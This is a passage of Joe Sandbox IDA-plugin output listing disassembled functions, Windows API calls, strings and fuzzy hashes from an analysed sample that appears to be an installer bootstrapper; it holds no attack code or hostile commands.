                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get value as version for variable: %ls$Failed to get value of variable: %ls
                                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-1851729331
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5788036e7e3625bf2c3547be2928582d89a55bb4f951bf99293142c5dda44e29
                                                                                                                                                                                                                                                                                                  • Instruction ID: 37d0aa0a0eb892e6ecd278744299746f8de17666cf05c161fcf4853698bad302
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5788036e7e3625bf2c3547be2928582d89a55bb4f951bf99293142c5dda44e29
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F01F232944529FBCF125F88CC0DA9E3B24FF21728F024160FD04EA221D3369E209BD5
                                                                                                                                                                                                                                                                                                  Function 00867539 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,00000006,?,00869897,00000000,?,00000000,00000000,00000000,?,008696D6,00000000,?,00000000,00000000), ref: 00867545
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000000,00000000,00000000,00000000,?,00869897,00000000,?,00000000,00000000,00000000,?,008696D6,00000000,?,00000000), ref: 0086759B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to copy value of variable: %ls, xrefs: 0086758A
                                                                                                                                                                                                                                                                                                  • Failed to get value of variable: %ls, xrefs: 0086756B
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                  • String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls
                                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-2936390398
                                                                                                                                                                                                                                                                                                  • Opcode ID: ea54cb5e2f947483d4271d55c1c52f819ed9a3f3d1fe85a92d12f4b28bd41024
                                                                                                                                                                                                                                                                                                  • Instruction ID: 347bf1eee1b86632f493bb59e97791e2f5995f2aab20d9fcc7aad949e50de503
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea54cb5e2f947483d4271d55c1c52f819ed9a3f3d1fe85a92d12f4b28bd41024
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2F08C32940228BBDF126F94CC0999E3F68FF06365F018160FD15E6221C7369E209BD1
                                                                                                                                                                                                                                                                                                  Function 0088E776 Relevance: 6.0, APIs: 4, Instructions: 26timethreadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0088E788
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0088E797
                                                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 0088E7A0
                                                                                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 0088E7AD
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: db0603c71beaef41fc876cbf4e6a38d1ead5db2b567325aff8fecd751b23fd11
                                                                                                                                                                                                                                                                                                  • Instruction ID: df4f442ab779faa5a89ab3cfc7873e9051208ccaac61b1e30367c20ed188335c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db0603c71beaef41fc876cbf4e6a38d1ead5db2b567325aff8fecd751b23fd11
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6CF07A70C1020CEBDF00DBA4D949A9EBBF8FF08201F514895A401E6211E734AA048B61
                                                                                                                                                                                                                                                                                                  Function 008A0C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 008A0DD7
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                                                                                  • String ID: regutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3535843008-955085611
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1aabba4a13f41626a4bfc84a2f6c2f169890908b173779a8ae83afb90eb469f4
                                                                                                                                                                                                                                                                                                  • Instruction ID: db3a55d2233216717b9d0c7338786c85dddd6b3bf0efb0926274ee87d96e73e5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1aabba4a13f41626a4bfc84a2f6c2f169890908b173779a8ae83afb90eb469f4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0541C433D01529EBFB318AE8CC04BAE7661FB02760F258364F914EAA50D7759D509FD1
                                                                                                                                                                                                                                                                                                  Function 008A479B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0F6C: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,008CAAA0,00000000,?,008A57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008A0F80
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,00000003,?,00000000,00000000,00000101), ref: 008A48FC
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                                                                                  • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                                                                                                                                                                                                                                  • API String ID: 47109696-3023217399
                                                                                                                                                                                                                                                                                                  • Opcode ID: c71ad95b82f459eb50bbb3318bc80bdcb96296308782c6c847d2fdd82d5fab93
                                                                                                                                                                                                                                                                                                  • Instruction ID: 915c1c1341a128f8526342f8d5a31e6460244e49bd4e21dfaa5345a6226f120c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c71ad95b82f459eb50bbb3318bc80bdcb96296308782c6c847d2fdd82d5fab93
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C41AD30E00159EBEF20DF88D841AAEBBB5FF86B10F255079E500E7A11E7B49E50DB50
                                                                                                                                                                                                                                                                                                  Function 008A10B5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 008A112B
                                                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 008A1163
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: QueryValue
                                                                                                                                                                                                                                                                                                  • String ID: regutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3660427363-955085611
                                                                                                                                                                                                                                                                                                  • Opcode ID: e28b1d9efe5b82f921e3fda6ed83097c7f68dada77518a64224f0d850c263819
                                                                                                                                                                                                                                                                                                  • Instruction ID: 905d904f27e1fe8c2b518335af2b60eec58aa0a8e05ab10b91ed62933359a7f5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e28b1d9efe5b82f921e3fda6ed83097c7f68dada77518a64224f0d850c263819
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35418332D0052AEBEF209F98CC499AEBBB9FF05350F15416AFA11EB650D7719E109B90
                                                                                                                                                                                                                                                                                                  Function 008966D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(008AB518,00000000,00000006,00000001,comres.dll,?,00000000,?,00000000,?,?,00000000,00000006,?,comres.dll,?), ref: 008967A3
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008967BF
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                                                                                                                                                                  • String ID: comres.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 203985260-246242247
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8047c806940d50540a19510b3a71a5b71057e36f678d02b1ea0b6eb1f5c3f43e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6106bd6e56867d4b569e58e62c859f9177aa892d3863af5fbf112fafe88c3f7a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8047c806940d50540a19510b3a71a5b71057e36f678d02b1ea0b6eb1f5c3f43e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB31C535600215BBCF21BF99C985AAB7B68FF51768F1C0265F814CB591FB708D10C7A2
                                                                                                                                                                                                                                                                                                  Function 008A8F7A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A8E44: lstrlenW.KERNEL32(00000100,?,?,?,008A9217,000002C0,00000100,00000100,00000100,?,?,?,00887D87,?,?,000001BC), ref: 008A8E69
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,008AB500,wininet.dll,?), ref: 008A907A
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,008AB500,wininet.dll,?), ref: 008A9087
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0F6C: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,008CAAA0,00000000,?,008A57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008A0F80
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0E4F: RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,00888E1B), ref: 008A0EAA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0E4F: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00888E1B,00000000), ref: 008A0EC8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Close$EnumInfoOpenQuerylstrlen
                                                                                                                                                                                                                                                                                                  • String ID: wininet.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 2680864210-3354682871
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7d381be425b7e2abc1661dbedf620d5ad3651d3b960ffec0a09c51e919461e1b
                                                                                                                                                                                                                                                                                                  • Instruction ID: c35e3e84393874de0d269f4efc0423a6503b11b4fc2ec5d7e78d5b134c88fd10
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d381be425b7e2abc1661dbedf620d5ad3651d3b960ffec0a09c51e919461e1b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F312832C0152AEFEF21AFA8C9408AEBBB9FF05750F518179EA41B6521D7318E50DB91
                                                                                                                                                                                                                                                                                                  Function 008A939E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A8E44: lstrlenW.KERNEL32(00000100,?,?,?,008A9217,000002C0,00000100,00000100,00000100,?,?,?,00887D87,?,?,000001BC), ref: 008A8E69
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000000,?), ref: 008A9483
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000,00000000,?), ref: 008A949D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0BE9: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,0087061A,?,00000000,00020006), ref: 008A0C0E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A14F4: RegSetValueExW.ADVAPI32(00020006,008B0D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0086F335,00000000,?,00020006), ref: 008A1527
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A14F4: RegDeleteValueW.ADVAPI32(00020006,008B0D10,00000000,?,?,0086F335,00000000,?,00020006,?,008B0D10,00020006,00000000,?,?,?), ref: 008A1557
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A14A6: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,0086F28D,008B0D10,Resume,00000005,?,00000000,00000000,00000000), ref: 008A14BB
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Value$Close$CreateDeletelstrlen
                                                                                                                                                                                                                                                                                                  • String ID: %ls\%ls
                                                                                                                                                                                                                                                                                                  • API String ID: 3924016894-2125769799
                                                                                                                                                                                                                                                                                                  • Opcode ID: ded7a632aed5782d006daa2aa5972a2aa1d381c3514b480aa8f31ad14835bec4
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1bb238dbf6b1ee9e9676782b0a780d405f7ef46d9d7dce1f2f188982acb832ae
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ded7a632aed5782d006daa2aa5972a2aa1d381c3514b480aa8f31ad14835bec4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA313A72C0212EBFAF129F98CC4199EBBB9FB09710B014166E944B6521D7318E21EB91
                                                                                                                                                                                                                                                                                                  Function 00863A4D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _memcpy_s
                                                                                                                                                                                                                                                                                                  • String ID: crypt32.dll$wininet.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 2001391462-82500532
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0011009348c22b5e832ea82858c93897483b8e9d66932b506b87b8fd8fea0445
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0a577301c118372d2892c416fe6de27a87ac0f602b793f0d7537625e387e7096
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0011009348c22b5e832ea82858c93897483b8e9d66932b506b87b8fd8fea0445
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE118E71600219ABCB08DE59CD859AFBF69EF85390B15802AFD058B311D231EA10DBE0
                                                                                                                                                                                                                                                                                                  Function 008A14F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(00020006,008B0D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0086F335,00000000,?,00020006), ref: 008A1527
                                                                                                                                                                                                                                                                                                  • RegDeleteValueW.ADVAPI32(00020006,008B0D10,00000000,?,?,0086F335,00000000,?,00020006,?,008B0D10,00020006,00000000,?,?,?), ref: 008A1557
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Value$Delete
                                                                                                                                                                                                                                                                                                  • String ID: regutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1738766685-955085611
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4f47ab5560e4d4fe86ff1f46a16ea44ea7174e21b175c5d9a766eb26aeb0158d
                                                                                                                                                                                                                                                                                                  • Instruction ID: c8f511cee8acd7aa199401e4abca7b0c64c650169ba4dd576c497a3267a0119c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f47ab5560e4d4fe86ff1f46a16ea44ea7174e21b175c5d9a766eb26aeb0158d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D11E336D1153AB7EF214A948C0AFAA7A25FB46770F150221BD12EA950E731CD20A7E0
                                                                                                                                                                                                                                                                                                  Function 0086DDB3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,?,000000FF,IGNOREDEPENDENCIES,00000000,?,?,00887691,00000000,IGNOREDEPENDENCIES,00000000,?,008AB518), ref: 0086DE04
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • IGNOREDEPENDENCIES, xrefs: 0086DDBB
                                                                                                                                                                                                                                                                                                  • Failed to copy the property value., xrefs: 0086DE38
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                                                                                                                                                  • String ID: Failed to copy the property value.$IGNOREDEPENDENCIES
                                                                                                                                                                                                                                                                                                  • API String ID: 1825529933-1412343224
                                                                                                                                                                                                                                                                                                  • Opcode ID: d9b10ca7d5aba5836c0a81d60320bf5f493656db7c7166e6d4aadbd30bdfe309
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7db4917b9d2be96a2f1fcb4fe6e2c41c851d829d47ed26b9f7b60e8824ddd366
